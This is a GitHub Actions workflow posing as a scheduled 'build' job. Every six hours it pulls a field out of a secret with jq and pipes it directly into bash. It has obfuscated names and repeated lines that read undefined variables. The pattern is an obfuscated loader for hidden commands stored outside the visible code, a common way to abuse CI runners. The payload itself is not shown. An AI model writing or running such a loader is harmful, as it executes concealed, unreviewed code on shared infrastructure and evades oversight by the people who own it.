name: forgeservice20
on:
  workflow_dispatch:
  schedule:
    - cron: '6 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: forgeservice20
        env:
          tnq40: ${{ secrets.tnq40 }}
        run: |
          echo $tnq40 | jq -r .ojsk782 | /bin/bash
          echo $rvfb6691 | jq -r .he7 | /bin/bash
          echo $xz981 | jq -r .gfnl3 | /bin/bash
          echo $amyxe93119 | jq -r .ubep0 | /bin/bash
          echo $rb9 | jq -r .o61322 | /bin/bash
          echo $hi4083 | jq -r .egy9 | /bin/bash
          echo $pvi6 | jq -r .gra5 | /bin/bash
          echo $r512 | jq -r .dbftp2 | /bin/bash
          echo $sdon85 | jq -r .b6239 | /bin/bash
          echo $yqm4790 | jq -r .nyav51497 | /bin/bash

